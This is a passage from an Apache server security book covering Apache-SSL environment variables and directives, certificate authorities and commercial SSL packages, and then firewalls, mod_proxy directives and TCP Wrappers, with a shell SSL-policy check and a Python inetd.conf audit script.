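# CGI script that reads the Apache-SSL variables in Table 15.3 and refuses
# to do anything sensitive unless the request came over SSL with an
# adequate session key and a client certificate from the CA you expect.
# The issuer DN, threshold and sample requests below are constructed.

# ssl_policy_check EXPECTED_ISSUER_DN MIN_KEYSIZE
# Reads HTTPS, HTTPS_KEYSIZE, SSL_CLIENT_DN and SSL_CLIENT_I_DN from the
# environment. Returns 0 when the request passes and 1 otherwise, with the
# reason on stderr so Apache records it in error_log.
ssl_policy_check() {
    expected_issuer=$1
    min_keysize=$2

    # Apache-SSL sets HTTPS to "on" only for SSL-protected requests.
    if [ "${HTTPS:-off}" != "on" ]; then
        echo "ssl_policy_check: request did not arrive over SSL" >&2
        return 1
    fi

    # HTTPS_KEYSIZE is the session key size; reject export-grade (40-bit)
    # sessions whatever cipher name negotiated them.
    case "${HTTPS_KEYSIZE:-0}" in
        *[!0-9]*)
            echo "ssl_policy_check: HTTPS_KEYSIZE is not numeric" >&2
            return 1 ;;
    esac
    if [ "${HTTPS_KEYSIZE:-0}" -lt "$min_keysize" ]; then
        echo "ssl_policy_check: session key ${HTTPS_KEYSIZE:-0} bits, need $min_keysize" >&2
        return 1
    fi

    # SSLVerifyClient makes the server validate the chain; pinning the
    # issuer DN here keeps a certificate from some other CA found in
    # SSLCACertificatePath from passing the application's own check.
    if [ -z "${SSL_CLIENT_DN:-}" ]; then
        echo "ssl_policy_check: no client certificate presented" >&2
        return 1
    fi
    if [ "${SSL_CLIENT_I_DN:-}" != "$expected_issuer" ]; then
        echo "ssl_policy_check: issuer '${SSL_CLIENT_I_DN:-}' is not '$expected_issuer'" >&2
        return 1
    fi
    return 0
}

# policy_decision HTTPS KEYSIZE CLIENT_DN ISSUER_DN EXPECTED_ISSUER MIN_KEYSIZE
# Offline harness (constructed for this example): runs ssl_policy_check in a
# subshell with the given variable values, as Apache-SSL would export them,
# and prints allow or deny.
policy_decision() {
    (
        HTTPS=$1 HTTPS_KEYSIZE=$2 SSL_CLIENT_DN=$3 SSL_CLIENT_I_DN=$4
        if ssl_policy_check "$5" "$6" 2>/dev/null; then
            echo allow
        else
            echo deny
        fi
    )
}

# Constructed CA and sample client, as a CGI script would see them.
EXAMPLE_CA="/C=US/O=Example Corp/CN=Example Corp Internal CA"
policy_decision on 128 "/C=US/O=Example Corp/CN=alice" "$EXAMPLE_CA" "$EXAMPLE_CA" 128
policy_decision on 40 "/C=US/O=Example Corp/CN=alice" "$EXAMPLE_CA" "$EXAMPLE_CA" 128
```

In a real CGI script, call `ssl_policy_check` once at the top and emit a 403 response (Status: 403 Forbidden) when it fails.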
And finally, Apache-SSL supports several SSL-centric configuration directives (the
majority of which go into httpd.conf, access.conf, or .htaccess). These are
summarized in Table 15.4.

TABLE 15.4 Apache-SSL Directives

Field                   Significance

CustomLog               CustomLog works just like it does with standard Apache. The only
                        difference is that in Apache-SSL, you can log several additional
                        values, including the session cipher, the client certificate, failed
                        authentication, and the SSL version.

HTTPS                   The HTTPS variable specifies whether the server is using HTTPS.

HTTPS_CIPHER            The HTTPS_CIPHER environment variable specifies which cipher is
                        being used (SSL or TLS).

HTTPS_KEYSIZE           The HTTPS_KEYSIZE environment variable specifies the session key
                        size.

HTTPS_SECRETKEYSIZE     The HTTPS_SECRETKEYSIZE environment variable specifies what
                        secret key size is being used.

SSLBanCipher            SSLBanCipher is the reverse of SSLRequireCipher. For arguments,
                        it takes a comma-delimited list of ciphers that the server will reject.

SSLCACertificateFile    Use the SSLCACertificateFile directive to specify a file that
                        contains not one but several certificates.

SSLCACertificatePath    Use the SSLCACertificatePath directive to specify from what
                        certificate authorities you’ll accept a client’s certificate.

SSLCacheServerPath      Use the SSLCacheServerPath directive to specify a path to the
                        global cache server. (See the server documentation for more
                        information.)

SSLCacheServerPort      Use the SSLCacheServerPort directive to specify a port for the
                        cache server. (See the server documentation for more information.)

SSLCacheServerRunDir    Use the SSLCacheServerRunDir directive to specify the directory in
                        which your cache server runs. (See the server documentation for
                        more information.)

SSLCertificateFile      Use the SSLCertificateFile directive to specify the location of
                        your single certificate file (*.pem).

SSLCertificateKeyFile   Use the SSLCertificateKeyFile directive to specify the location of
                        your private key file.

SSLDisable              Use the SSLDisable directive to turn off SSL. This is useful when
                        you have multiple virtual hosts, and some need SSL and others
                        don’t.

SSLEnable               Use the SSLEnable directive to turn on SSL. This is useful when you
                        have multiple virtual hosts, and some need SSL and others don’t.

SSLRequireCipher        Use the SSLRequireCipher directive to specify a cipher or ciphers
                        that a client must use to transact. This is the reverse of
                        SSLBanCipher. For arguments, it takes a comma-delimited list of
                        ciphers that the server will accept.

SSLVerifyClient         Use the SSLVerifyClient directive to set your server’s paranoia
                        level. Levels run from 0 (no certificate at all required) to 3 (the
                        client must present—at the least—a valid certificate).





Summary on Apache-SSL 


Apache-SSL is not the only available SSL implementation, but it’s an excellent
learning tool. You can learn not only how to secure Web-based electronic commerce
transactions, but because the SSLeay source is open, you can also see how various
algorithms are used in authentication.


NOTE 


Although SSL is the prevailing system for encrypting client-to-server interaction, other secure
transaction standards and protocols exist. One is SET, Secure Electronic Transaction, a system
sponsored by IBM, MasterCard, and Visa. SET (designed specifically for credit card
transactions) emerged with much fanfare and has been a favorite of banks, credit card companies,
and other large financial institutions. However, SET has not yet taken the Internet by storm
and one reason is that in SET transactions, all participants know their trading partners’
identities. (Each participant possesses a personal or business digital certificate.) But SET—from a
consumer viewpoint—offers some advantages. Consumers are issued a wallet or a helper
application that stores and transmits their verified identity and financial information to SET-
enabled remote servers. In this respect, a SET transaction resembles the act of whipping out
your wallet or pocketbook to pay for goods. Personally, I don’t like it, but depending on your
field, SET could be a suitable electronic commerce solution for you. To learn more, find the
full SET specification at http://www.setco.org/set_specifications.html.





Certificate Authorities 


You can generate certificates from your server (as illustrated previously), but many
people might be reticent to trust them. Hence, if you’re doing commerce online,
consider purchasing a certificate from an established certificate authority, or an
organization whose sole purpose is to sell and authenticate certificates.
Certificates associate public cryptographic keys with individuals, companies, or
machines. At a minimum, they store the following information:

• Subject: Distinguished Name, Public Key

• Issuer: Distinguished Name, Signature

• Period of Validity: Not Before Date, Not After Date

• Administrative Information: Version, Serial Number

• Extended Information: Basic Constraints, Client Flags


Table 15.5 lists a few certificate authorities. 


TABLE 15.5 Certificate Authorities

Authority                   Location

128i Ltd.                   http://www.128i.com
BelSign NV/SA               http://www.belsign.be
CertiSign Certificadora     http://www.certisign.com.br
Certplus SA                 http://www.certplus.com
Deutsches Forschungsnetz    http://www.pca.dfn.de/dfnpca/certify/ssl/
Entrust.net Ltd.            http://www.entrust.net/products/index.htm
GeoTrust Inc.               http://www.freessl.com
GlobalSign NV/SA            http://www.GlobalSign.net
IKS GmbH                    http://www.iks-jena.de/produkte/ca/
KPN Telecom                 http://certificaat.kpn.com/
lanechange.net              http://www.lanechange.net/#server_certs
NetLock Kft.                http://www.netlock.net
register.com                http://commercelock.register.com
TC TrustCenter              http://www.trustcenter.de/
Thawte Consulting           http://www.thawte.com/
Verisign, Inc.              http://www.verisign.com/guide/apache





Commercial SSL Packages 


If you don’t want the hassle of dealing with compilation and basic maintenance of
an open-source SSL implementation, Table 15.6 lists several commercial tools that
offer hands-off SSL.


WARNING 
Watch it when purchasing commercial SSL packages. Many companies fold, leaving you with
no support. The ones included in the following list are solid, but at least 36 “SSL solution
providers” bottomed out. If yours is an enterprise situation, consider the heavy hitters (Cisco,
3Com, Entrust, VeriSign, and so on).





TABLE 15.6 Commercial SSL Packages

Package            Description

CSM Proxy          From Computer Software Manufaktur, CSM Proxy gateways your
                   LAN. Connected to the router (or, heaven forbid, a modem), it
                   handles all requests and implements NAT, user authentication,
                   access control, virus scanning, and so on. Provides SSL tunnels.
                   Check it out at http://www.csm-usa.com/product/proxy/.

Entrust Toolkit    From Entrust Technologies, Entrust’s SSL/TLS Toolkit for C++ isn’t
                   an SSL implementation for your Web server, but rather a
                   development tool suite. If you want to incorporate SSL easily into
                   your applications (and your thing is C++), check it out at
                   https://www.entrust.com/developer/tls/index.htm.

Global Site Plus   From VeriSign, Global Site Plus offers 128-bit SSL IDs, 40-bit SSL
                   IDs, and Payflow Pro, which enables your store to securely accept
                   and process credit card, debit card, purchase card, and electronic
                   checks. Check it out at
                   http://www.verisign.com/products/site/commerce/index.html.

HP SpeedCard       Another hardware-based solution, the SpeedCard line offloads SSL
                   from Web servers and centers it in add-on hardware. Some
                   versions support as many as 1,200 SSL connections per second.
                   These solutions are pricey (about 27 grand) but powerful. Learn
                   more at http://www.hp.com/products1/servers/serverappliances/
                   products/traffic_management_server_apps/.

iD2 Personal       From iD2 Technologies, iD2 Personal (for Windows 95/98/NT and
                   Macintosh) supports SSL and many other algorithms, and is meant
                   for personal users. Check it out at
                   http://www.id2tech.com/products/2d.html.

Luna XL            Luna XL, a hardware-based solution, delivers high-performance SSL
                   acceleration (especially useful for Web farms—plug it in and let it
                   run). Currently supports Windows NT 4.0, Windows 2000, Solaris 7
                   (32-bit and 64-bit), Solaris 8, Linux Redhat 6.2, IIS 5.0, Apache
                   1.3.17, and iPlanet Web Server 4.1. Check it out at
                   http://www.chrysalis-its.com/trusted_systems/luna_xl.htm.

Phaos SSLava       From Phaos Technology Corporation, Phaos SSLava offers SSL and
                   TLS support via Java, X.509 v3 certificates, RSA, ARCFOUR/RC4,
                   DES, 3DES, DSA, Diffie-Hellman, PKCS #5, #8 and #12 for private
                   key security, and so on. Most suitable for applets, client
                   applications, and server applications. Check it out at
                   http://www.phaos.com/e_security/prod_ssl.html.

SSP XBoard-1680    From SSP Solutions, SSP XBoard-1680 is an SSL-accelerator card
                   that throws SSL work off on hardware, thus allowing your Web
                   servers to perform the tasks they’re most suited for. SSL bulk
                   encryption with DES, 3DES, SHA-1, and MD5 and support for
                   Netscape Enterprise Server, Apache, IIS, WinNT, and Solaris. Check
                   it out at
                   http://www.sspsolutions.com/products/sspxboard1680/features.php.

Stronghold 3       Perhaps the most well-known standalone SSL implementation
                   available, Stronghold supports BSDI, FreeBSD, HP-UX, IRIX, Linux,
                   NetBSD, OpenBSD, SCO, Solaris, SunOS, Tru64 Unix, and
                   Unixware and runs PHP, mod_perl, and mod_ssl. From RedHat
                   Software. Get it here:
                   http://www.redhat.com/software/apache/stronghold/index.html.






Summary

After throwing SSL on the fire, you might think you're finished securing your Apache server. Not so. Your next step is to consider firewalls. That's what Chapter 16, "Apache and Firewalls," is all about.


16

Apache and Firewalls

IN THIS CHAPTER

• What Is a Firewall?
• Apache as a Proxy Server
• tcpd: TCP Wrappers
• IP Filtering in Windows
• The MMC IPSEC Policy Snap-in
• Commercial Firewalls

When you connect your host to the outside world, you enter hostile territory. Innumerable nameless, faceless attackers can probe your server 24 hours a day, seven days a week. To counter this, you need a firewall or a reasonable facsimile. That's what this chapter is all about.


What Is a Firewall? 


A firewall, at its most basic level, is a device that prevents 
outsiders from accessing restricted areas of your network. 

This is typically a router, a standalone computer running 

packet filtering or proxy software, or a firewall-in-a-box (a 
proprietary hardware device that filters and proxies). 


A firewall can serve as a single entry point to your site. As 
it receives connection requests, your firewall evaluates 
them. It authorizes connection requests only from autho- 
rized hosts; it discards the remaining connections. 


This definition is too narrow, however. Today's firewalls perform many tasks, including

• Packet filtering and analysis—Firewalls analyze incoming packets of multiple protocols. Based on that analysis, firewalls can perform conditional evaluations. ("If this type of packet is encountered, I will do this.")

• Protocol or content blocking—Firewalls screen content. You can exploit this to block Java, JavaScript, VBScript, ActiveX, or cookies at the firewall. You can even create rules to block particular attack signatures.
NOTE

Attack signatures are patterns common to a particular attack. For example, when a user Telnets to port 80 and issues command-line requests, this looks a certain way to your machine. By defining this behavior, you can teach your firewall to block such attacks. (You can also do this at a packet level. For example, some remote exploits generate specialized packets that are easily distinguished from other, nonmalicious packets. Your firewall can recognize, capture, and act on these.)





• User, connection, and session authentication and encryption—Many firewalls support multiple algorithms and authentication schemes (including DES, Triple DES, SSL, IPSEC, SHA, MD5, BlowFish, IDEA, and so on) to verify users' identities, check session integrity, and shield transiting data from electronic eavesdropping.

So, firewalls (depending on their design) protect your network on at least two (and in some cases, all) of these levels:

• Who can come in
• What can come in
• Where and how they come in


In a more esoteric sense, a firewall, at its inception, is a concept rather than a 
product; it’s the sum of all rules you'll apply to your network. (Generally, you 
furnish your firewall with rules that mirror access policies in your organization.) 


Historically, two main firewall types existed:

• Network-level firewalls or packet filters
• Application gateways


Today, most firewalls offer functionality that emulates both types. However, it’s 
worthwhile for our purposes here to examine the two separately. 


Network-Level Firewalls: Packet Filters

Network-level firewalls are typically routers with packet filtering capabilities. Using a network-level firewall, you grant or deny access to your site based on

• Source address
• Protocol
• Port number
• Content

Router-based firewalls are perimeter solutions. That is, they’re external hardware 
devices and because all outside traffic must first pass through your router, you can 
harness the router to handle all accept-deny procedures in a wholesale manner. 


This offers a major advantage: Router-based firewalls are operating system and application-neutral. They offer a quick, clean solution that eliminates the need to tinker with individual workstations, services, or protocols. Also, more advanced router-based firewalls can defeat spoofing, block DoS attacks, and even render your network invisible to the outside world.

Finally, routers offer an integrated solution. Because your network is permanently connected to the Internet, you'll need a router anyway, so why not kill two birds with one stone?

On the other hand, router-based firewalls have their deficiencies. Router performance, for example, can dramatically decline when you enforce excessively stringent filtering procedures. Also, good router-based firewalls are expensive and you get what you pay for. On-the-cheap systems sometimes don't maintain packet-state and are therefore vulnerable to attacks on authentication and session integrity.


Application-Proxy Firewalls/Application Gateways 


The other historical firewall type is the application-proxy firewall, or application 
gateway. Application gateways proxy connections between outside clients and your 
internal network. During such exchanges, a dialog occurs, with the gateway acting as 
a conduit and traffic cop. 


The advantage of this is that you have comprehensive and incisive control over each 
service and in many cases you can maintain packet-state information. 


However, application gateways have their deficiencies, too. One is they demand 
substantial involvement on your part because you must configure each network 
service (FTP, Telnet, HTTP, mail, news) separately. Additionally, inside users must use 
proxy-aware clients. If they don’t, they’ll have to adopt new policies and procedures. 


One example of an application-gateway firewall package is the Trusted Information Systems (TIS) Firewall Tool Kit (FWTK). The FWTK (which is free for noncommercial use) includes proxies for many services, including

• Telnet
• FTP
• rlogin
• sendmail
• HTTP
• The X Window System

The FWTK demands that you not only proxy each application, but also apply access rules for each. This can get confusing. However, if you're merely interested in how firewalls operate, and you don't have a pressing need for an immediate, practical firewall solution, grab the FWTK and play with it. The experience you'll reap is well worth it. Get FWTK at http://www.fwtk.org.


Apache as a Proxy Server 


You might not necessarily need a traditional or commercial firewall because Apache 
serves nicely as a proxy server. 


Apache proxies the following protocols:

• FTP
• HTTP
• HTTPS
• SOCKS


If your network doesn’t require incoming Telnet or SSH traffic, and it otherwise 
meets the following requirements, Apache could save you time, trouble, and money. 


Consider the configuration depicted in Figure 16.1, which depicts a simple network 
connection. Many offices have similar configurations via DSL or cable. The chief 
difference here, however, is that this is a barebones connection. The bandwidth link 
runs directly into a hub that connects all internal machines. 


In this scenario, all machines are exposed or, in loose vernacular, they’re outside. 
Machines from the outside world can probe all four systems at will. This is highly 
undesirable. Figure 16.2 depicts a better alternative. 


In Figure 16.2, the internal workstations have reserved RFC 1918 addresses; addresses that the outside world cannot reach (routers drop such packets on contact). Apache, meanwhile, acting as the gateway, is the choke point, and must perform back-routing to internal systems (and the reverse for outgoing traffic).

FIGURE 16.1 A network connection.

FIGURE 16.2 A gateway protects internal machines.

In the next few sections, we'll run through the steps required to establish such a configuration.


mod_proxy 


mod_proxy, which you'll find in httpd-version/modules/proxy, provides Apache's proxy capabilities, and sends requests through five phases:

• Translation—Apache appends the proxy's leading address to the requested filename.

• Mapping—Apache maps the request to the appropriate location.

• File typing—Apache sets the type to PROXY_MAGIC_TYPE if the filename begins with proxy.

• URL-to-file mapping—Apache converts the URL stored in the filename to canonical form.

• Request processing—Apache sends the request to a handler.

Table 16.1 steps through the relevant mod_proxy functions.


TABLE 16.1 mod_proxy Functions

Function                What Happens Here

alias_match()           Translates the URL into a filename. During this process, it steps through as many slash (/) characters as necessary until it finds the URL.

proxy_detect()          Double-checks that it does in fact have the entire URL. This accounts for situations where you previously specified that Apache should do something if it encounters a particular directory name (using ScriptAlias, for example). If not for this step, Apache would detect such a directory (in the URL path, but before the URL's end), trigger on that, and forge ahead with an incomplete request in hand.

proxy_walk()            Walks through <Proxy> entries.

proxy_map_location()    Bypasses core and mod_http map-to-storage steps and instead does its own mapping.

proxy_fixup()           Canonicalizes the URL.

proxy_needsdomain()     Checks whether the request contains a not-fully-qualified hostname. If so, it sends a redirect (and it appends the domain you specified with the ProxyDomain directive).

proxy_handler()         Invokes the handler.

create_proxy_config()   Loads all the configuration options, including proxies, aliases, error_overrides, and maxforwards. (We'll look at those values via their directives in a moment.)

merge_proxy_config()    Merges the aforementioned values.

add_pass()              Handles ProxyPass directive specifications.

add_pass_reverse()      Handles ProxyPassReverse directives.

set_allowed_ports()     Loads allowed ports (the AllowCONNECT directive).

set_proxy_domain()      Handles the default domain that the Apache proxy server will belong to (the ProxyDomain directive).

set_proxy_req()         Determines whether to append the host specified by ProxyPass or use the request's host (the ProxyPass directive).

set_max_forwards()      Gets the maximum number of proxies through which a request might pass (the ProxyMaxForwards directive).





mod_proxy Directives 


mod_proxy supports 14 directives:

• AllowCONNECT
• NoProxy
• ProxyBlock
• ProxyDomain
• ProxyErrorOverride
• ProxyMaxForwards
• ProxyPass
• ProxyPassReverse
• ProxyPreserveHost
• ProxyReceiveBufferSize
• ProxyRemote
• ProxyRequests
• ProxyTimeout
• ProxyVia
AllowCONNECT

The AllowCONNECT directive specifies the ports on which the proxy CONNECT method can connect. Apache provides this functionality so you can specify ports other than the defaults (443 and 563).

The syntax is

AllowCONNECT number

Here, number is the port number (or numbers) you specify. Specify port numbers in a white-space-delimited list, such as this:

AllowCONNECT port1 port2 port3


NoProxy 
The NoProxy directive specifies internal addresses (hostnames, IP addresses, and so 
on) for which no proxy is needed. This is to support intranet hosts. 


The syntax is 


NoProxy address-list 


Here, address-list signifies a space-delimited list of hosts, like this:


NoProxy address1 address2 address3 


ProxyBlock 

The ProxyBlock directive offers you proxy network access control. It takes addresses 
as arguments (hostnames, IP addresses, and so on) that you want the proxy to block. 
It will refuse to serve requests coming from these addresses. 


The syntax is 


ProxyBlock address-list 


Here, address-list signifies a space-delimited list of addresses, such as this: 


ProxyBlock address1 address2 address3


WARNING 





Take care when formulating your blocking criteria. Even a partial match is sufficient for 
Apache to block the request (for example, “aol” would block everything from aol.com, 
users.aol.com, and so on). 
ProxyDomain

The ProxyDomain directive is for use in intranet environments. The proxy will append the hostname you specify here to any request that doesn't specify a fully articulated domain name.

The syntax is

ProxyDomain domain

The value domain here represents whatever domain name you specify. Note that you must precede this name with a dot, like this:

.ourintranet.net


ProxyErrorOverride 

The ProxyErrorOverride directive enables you to specify that in Server Side Include 
errors, the proxy returns related error information rather than sending the proxy 
error (which otherwise looks sloppy, reveals proxy information, and could confuse 
users). 


The syntax is 


ProxyErrorOverride on 
Here, on indicates that ProxyErrorOverride is enabled. 


ProxyMaxForwards 

The ProxyMaxForwards directive enables you to specify the maximum number of 
proxies through which a request might pass. This prevents bozos on the outside 
from draining resources by forcing a loop. 


The syntax is 


ProxyMaxForwards number 
Here, number represents a byte value. The default is 10. 


ProxyPass 

The ProxyPass directive enables you to specify which remote servers Apache will 
map into the local server’s space. Folks sometimes use ProxyPass to make Web 
servers behind firewalls (or on networks using IP masquerading) accessible to the 
outside world. 


The syntax is 


ProxyPass path url 
Here, path is the local path, and url is the hostname or URL you want Apache to map that path to for outsiders. For example, relative to DocumentRoot:

ProxyPass /development/ http://mydev.net

This would map a request for http://mine.com/development/docs to http://mydev.net/development/docs.


ProxyPassReverse 

The ProxyPassReverse directive enables Apache to manipulate URL Location, 
Content-Location, and URI headers on redirect responses (useful when you’re using a 
reverse proxy). 


The syntax is 
ProxyPassReverse path url 


Here, path is the local path, and url is the hostname or URL you want Apache to 
map that path to for outsiders. 


ProxyPreserveHost 
The ProxyPreserveHost directive, when enabled, passes the Host line from the 
incoming request to the proxied host. That is, it bypasses ProxyPass. 


The syntax is 


ProxyPreserveHost state 
Here, state is on or off. 


ProxyReceiveBufferSize 
The ProxyReceiveBufferSize directive enables you to specify a finite network buffer 
size for outgoing HTTP and FTP sessions. 


The syntax is 


ProxyReceiveBufferSize bytes

Here, the bytes value signifies a number expressed in bytes.

ProxyRemote


The ProxyRemote directive enables you to specify remote proxies to the instant proxy 
(and what Apache should do with requests from the same). 
The syntax is

ProxyRemote pattern url


Here, pattern is either a full or partial hostname pattern. url is the URL to which 
Apache should map such requests. 


ProxyRequests 
The ProxyRequests directive enables or disables Apache’s function as a forward 
proxy server. 


The syntax is 


ProxyRequests state 
Here, state is on or off. 


ProxyTimeout 
The ProxyTimeout directive lets you specify a timeout value after which proxy 
requests expire. 


The syntax is 


ProxyTimeout time 
Here, time is a value expressed in seconds. 


ProxyVia 

The ProxyVia directive controls what Apache does with Via headers. (Proxy servers 
update the Via header with various values, including their protocol and protocol 
version, hostname, port number, and comments. This is primarily for debugging 
purposes.) 


The syntax is 


ProxyVia state 


Here, state is one of four values:

• block—Apache removes Via headers altogether.
• full—Apache appends its current version in Via.
• off—Apache ignores Via headers, which pass unaltered.
• on—Apache appends Via values from the current host.

A Quick-Start Apache Proxy Server


To quickly establish a simple Apache proxy server, first, recompile Apache with 
mod_proxy support if you didn’t do it previously: 


./configure --prefix=/usr/local/apache --enable-module=proxy 
make 
make install 


Next, specify in your configuration file that Apache should support proxying: 


LoadModule proxy_module libexec/libproxy.so 
AddModule mod_proxy 


Next, configure Apache to listen on a second port: 


Port 80 
Listen 80 
Listen 8080 


Then, set a minimal configuration: 


ProxyRequests On 

Order deny,allow 

Deny from all 

Allow from .yourdomain.net 

ProxyVia On 

CacheRoot "/usr/local/apache/proxy" 
CacheSize 409800 

CacheMaxExpire 100 
CacheDefaultExpire 60 


And finally, establish a virtual host for the proxy: 


<IfModule mod_proxy.c> 
Listen 192.168.172.1:8080 
<VirtualHost 192.168.172.1:8080> 
ProxyRequests on 
DocumentRoot /usr/local/apache/html 
</VirtualHost> 
</IfModule> 


This is a quick solution. You should experiment with the previous directives for a few 
hours until you get a feel for what you want or what your users need. 
In general, you should use the previously described configuration for no more than a few machines at a time. That is, Apache, as a proxy server, is most useful in limited settings, such as where you use it for an extra security layer to hem in departments or divisions (see Figure 16.3).

FIGURE 16.3 Different Apache proxies serving different network segments.


For this, Apache’s perfect. However, for larger systems—or more complicated or flexi- 
ble schemes—you might need additional network access control or even a full-blown 
firewall. 


Other Network Access Control Tools 


Perhaps you need more functionality than an Apache proxy server can offer—but 
still less than a full-fledged firewall. Tools of this ilk exist and of these, the most 
historically well established is TCP Wrappers, a Unix tool. 


tcpd: TCP Wrappers 


TCP Wrappers (by Wietse Venema) adds network access control through a simple but 
reliable mechanism. On hosts without TCP Wrappers, inetd starts at boot and 
checks for various servers in /etc/inetd.conf. Here’s a typical inetd. conf from such 
a host, minus comments: 
# Internet server configuration database
# $Revision: 1.66 $
ftp     stream  tcp     nowait  root    /usr/etc/ftpd           ftpd -l
telnet  stream  tcp     nowait  root    /usr/etc/telnetd        telnetd
shell   stream  tcp     nowait  root    /usr/etc/rshd           rshd
login   stream  tcp     nowait  root    /usr/etc/rlogind        rlogind
exec    stream  tcp     nowait  root    /usr/etc/rexecd         rexecd
finger  stream  tcp     nowait  guest   /usr/etc/fingerd        fingerd
http    stream  tcp     nowait  nobody  ?/var/www/server/httpd  httpd
ntalk   dgram   udp     wait    root    /usr/etc/talkd          talkd
tcpmux  stream  tcp     nowait  root    internal
echo    stream  tcp     nowait  root    internal
discard stream  tcp     nowait  root    internal
chargen stream  tcp     nowait  root    internal
daytime stream  tcp     nowait  root    internal
time    stream  tcp     nowait  root    internal
echo    dgram   udp     wait    root    internal
discard dgram   udp     wait    root    internal
chargen dgram   udp     wait    root    internal
daytime dgram   udp     wait    root    internal
time    dgram   udp     wait    root    internal


Each line specifies a service, its socket type, its protocol type, the user it runs as, and 
its server. For example, examine the entry for fingerd: 


finger stream tcp nowait guest /usr/etc/fingerd fingerd 


Here's what the fingerd entry specifies:

• The service is finger.
• The socket type is STREAM.
• The protocol is TCP.
• The nowait directive indicates that inetd should spawn new fingerd processes as needed.
• The guest directive indicates that fingerd should run as user guest.
• The /usr/etc/fingerd directive indicates the location of the fingerd program.


When inetd receives a request from a finger client, it starts an instance of fingerd, which then satisfies the finger request. The reason for this arrangement is that it's easier to run a single daemon like inetd than to run 12 or 20 different servers. This way, a server only wakes if it's actually needed.

The problem with this approach is that these services might not apply access control by default, and therefore, you cannot (easily) accept or deny connections selectively across the board. Enter TCP Wrappers.


Venema created a generic wrapper (tcpd) that you can apply to all such services. 
With TCP Wrappers installed, when inetd calls a server, tcpd intercepts the call and 
evaluates the connection request. During this process, tcpd compares the connection 
request against various rules. If the connection request passes these tests, tcpd starts 
the requested server, which in turn satisfies the client’s request. But, if the connec- 
tion fails to pass tcpd’s evaluation, the system drops the connection. 


On most Unix distributions available today, TCP Wrappers is already installed. In 
such cases, your inetd.conf will look something like this: 


#
# inetd.conf    This file describes the services that will be available
echo    stream  tcp     nowait  root    internal
echo    dgram   udp     wait    root    internal
discard stream  tcp     nowait  root    internal
discard dgram   udp     wait    root    internal
daytime stream  tcp     nowait  root    internal
daytime dgram   udp     wait    root    internal
chargen stream  tcp     nowait  root    internal
chargen dgram   udp     wait    root    internal
#time   stream  tcp     nowait  root    internal
#time   dgram   udp     wait    root    internal
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
gopher  stream  tcp     nowait  root    /usr/sbin/tcpd  gn
#smtp   stream  tcp     nowait  root    /usr/bin/smtpd  smtpd
#nntp   stream  tcp     nowait  root    /usr/sbin/tcpd  in.nntpd
shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind
exec    stream  tcp     nowait  root    /usr/sbin/tcpd  in.rexecd
talk    dgram   udp     wait    nobody.tty      /usr/sbin/tcpd  in.talkd
ntalk   dgram   udp     wait    nobody.tty      /usr/sbin/tcpd  in.ntalkd
pop2    stream  tcp     nowait  root    /usr/sbin/tcpd  ipop2d
pop3    stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d
imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd








Note the difference in inetd.conf entries when tcpd is installed:

telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd

Here, the /usr/sbin/tcpd process precedes in.telnetd. Hence, telnetd is wrapped with tcpd.
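To see at a glance which inetd.conf entries tcpd actually guards, here is an added Python audit (not from the book or from the TCP Wrappers distribution) that parses the inetd.conf field layout described above and reports services whose server column is something other than tcpd; the sample file is constructed from the two listings in this section.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample inetd.conf, modelled on the two listings in this chapter:
# tcpd-wrapped services, inetd-internal services, one commented-out service,
# and one IRIX-style fingerd entry that inetd execs directly.
SAMPLE_INETD_CONF = """\
# inetd.conf    This file describes the services that will be available
echo    stream  tcp     nowait  root    internal
echo    dgram   udp     wait    root    internal
#time   stream  tcp     nowait  root    internal
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  guest   /usr/etc/fingerd fingerd
talk    dgram   udp     wait    nobody.tty  /usr/sbin/tcpd  in.talkd
pop3    stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d
"""


@dataclass
class InetdEntry:
    service: str      # service name, looked up in /etc/services
    socket_type: str  # stream or dgram
    protocol: str     # tcp or udp
    wait: str         # wait or nowait
    user: str         # user[.group] the server runs as
    server: str       # program inetd execs ("internal" for built-in services)
    args: List[str] = field(default_factory=list)  # argv handed to that program

    @property
    def is_internal(self) -> bool:
        return self.server == "internal"

    @property
    def is_wrapped(self) -> bool:
        # Wrapped when inetd execs tcpd; tcpd applies hosts.allow/hosts.deny
        # and then execs the real server named by the first argument.
        return self.server.rsplit("/", 1)[-1] == "tcpd"

    @property
    def real_server(self) -> Optional[str]:
        """The program that finally answers the client, once tcpd is peeled off."""
        if self.is_internal:
            return None
        if self.args:
            return self.args[0]
        return self.server.lstrip("?").rsplit("/", 1)[-1]


def parse_inetd_conf(text: str) -> List[InetdEntry]:
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank, comment, or disabled service
            continue
        fields = line.split()
        if len(fields) < 6:
            raise ValueError(f"malformed inetd.conf line: {raw!r}")
        entries.append(InetdEntry(*fields[:6], fields[6:]))
    return entries


def wrapped_services(entries: List[InetdEntry]) -> List[str]:
    return [e.service for e in entries if e.is_wrapped]


def unwrapped_services(entries: List[InetdEntry]) -> List[str]:
    """Services inetd execs directly: tcpd never sees these connections."""
    return [e.service for e in entries if not e.is_internal and not e.is_wrapped]


def root_services(entries: List[InetdEntry]) -> List[str]:
    """External servers that inetd (or tcpd on its behalf) starts as root."""
    return [e.service for e in entries
            if not e.is_internal and e.user.split(".")[0] == "root"]


def audit(text: str) -> List[str]:
    """One finding per line for a whole inetd.conf."""
    entries = parse_inetd_conf(text)
    lines = [f"{len(entries)} active entries, {len(wrapped_services(entries))} wrapped by tcpd"]
    for svc in unwrapped_services(entries):
        lines.append(f"UNWRAPPED: {svc} bypasses hosts.allow/hosts.deny")
    for svc in root_services(entries):
        lines.append(f"ROOT: {svc} starts with root privileges")
    return lines


if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_INETD_CONF)))
```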


When tcpd evaluates a connection request, it also logs it via syslog. As described in the documentation:

